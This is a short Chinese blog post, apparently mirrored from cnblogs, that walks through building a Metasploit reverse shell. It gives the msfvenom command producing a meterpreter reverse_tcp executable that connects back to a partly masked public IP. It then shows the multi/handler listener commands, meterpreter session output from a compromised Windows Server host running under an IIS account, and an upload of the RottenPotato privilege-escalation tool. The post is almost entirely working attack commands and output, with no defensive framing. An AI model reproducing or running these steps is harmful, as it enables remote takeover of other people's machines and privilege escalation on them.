zoukankan      html  css  js  c++  java
  • msf制作反弹shell

    msf制作shell

    1 .制作反弹shell-exe文件

    执行命令

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
    
    

    LHOST为公网IP

    LPORT为反弹端口

    4433.exe为生成文件

    2.控制端启动msfconsole,获取监听

    运行命令

    msfconsle
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
    msf5 exploit(multi/handler) > set LPORT 4433
    msf5 exploit(multi/handler) > run
    
    
    
    3.反弹成功
    meterpreter > sysinfo
    Computer        : WIN-UKKED2CCSHJ
    OS              : Windows 2012 R2 (6.3 Build 9600).
    Architecture    : x64
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 3
    Meterpreter     : x86/windows
    
    meterpreter > getuid
    Server username: IIS APPPOOLpadt002
    
    #上传文件
    meterpreter > upload /root/RottenPotato/rottenpotato.exe
    [*] uploading  : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    [*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    [*] uploaded   : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    
    
    所有的胜利,与征服自己的胜利比起来,都是微不足道;所有的失败,与失去自己的失败比起来,更是微不足道。
  • 相关阅读:
    tomcat-jvm参数优化
    k8s集群命令用法
    Zabbix-配置QQ邮箱报警通知
    zabbix监控实现原理
    adb无线调试安卓
    tiddlywiki安装和入门
    python处理excel和word脚本笔记
    路由和交换机调试笔记
    linux常用命令
    进程和线程的代码实现
  • 原文地址:https://www.cnblogs.com/8gman/p/12303787.html
Copyright © 2011-2022 走看看